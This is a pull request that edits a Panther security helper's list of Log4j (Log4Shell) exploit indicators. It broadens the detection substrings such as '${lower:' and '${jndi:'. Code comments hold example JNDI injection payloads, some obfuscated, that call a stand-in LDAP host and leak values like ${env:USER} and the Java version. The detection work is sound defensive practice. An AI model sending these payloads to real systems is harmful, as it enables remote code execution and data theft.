### PR TITLE
Log4j: Remove unnecessary colon, extra breadth

### DIFF
--- a/global_helpers/panther_iocs.py
+++ b/global_helpers/panther_iocs.py
@@ -781,7 +781,7 @@ LOG4J_EXPLOIT_IOCS = {
     "jndi:corba:/",
     "jndi:iiop:/",
     "jndi:${",
-    ":${lower:", # example: ${${lower:${lower:jndi}}:${lower:ldap}://example.com:1234/callback}
+    "${lower:", # example: ${${lower:${lower:jndi}}:${lower:ldap}://example.com:1234/callback}
     "${env:", # example: ${jndi:ldap://example.com:1234/callback/${env:USER}
     "${sys:", # example: ${jndi:ldap://example.com:1234/callback/${sys:java.version}
     "${java:", # example: ${jndi:ldap://example.com:1234/callback/${java:os}

--- a/global_helpers/panther_iocs.py
+++ b/global_helpers/panther_iocs.py
@@ -781,6 +781,7 @@ LOG4J_EXPLOIT_IOCS = {
     "jndi:corba:/",
     "jndi:iiop:/",
     "jndi:${",
+    "${jndi:", # breadth
     "${lower:", # example: ${jn${lower:d}i:l${lower:d}ap://example.${lower:c}om:1234/callback}
     "${env:", # example: ${jndi:ldap://example.com:1234/callback/${env:USER}
     "${sys:", # example: ${jndi:ldap://example.com:1234/callback/${sys:java.version}

--- a/global_helpers/panther_iocs.py
+++ b/global_helpers/panther_iocs.py
@@ -781,7 +781,7 @@ LOG4J_EXPLOIT_IOCS = {
     "jndi:corba:/",
     "jndi:iiop:/",
     "jndi:${",
-    "${lower:", # example: ${${lower:${lower:jndi}}:${lower:ldap}://example.com:1234/callback}
+    "${lower:", # example: ${jn${lower:d}i:l${lower:d}ap://example.${lower:c}om:1234/callback}
     "${env:", # example: ${jndi:ldap://example.com:1234/callback/${env:USER}
     "${sys:", # example: ${jndi:ldap://example.com:1234/callback/${sys:java.version}
     "${java:", # example: ${jndi:ldap://example.com:1234/callback/${java:os}


### PR DESCRIPTION
### Background

- `${jn${lower:d}i:l${lower:d}ap://example.${lower:c}om:1234/callback}` wouldn't have matched. Removed unnecessary colon
- Additional breadth
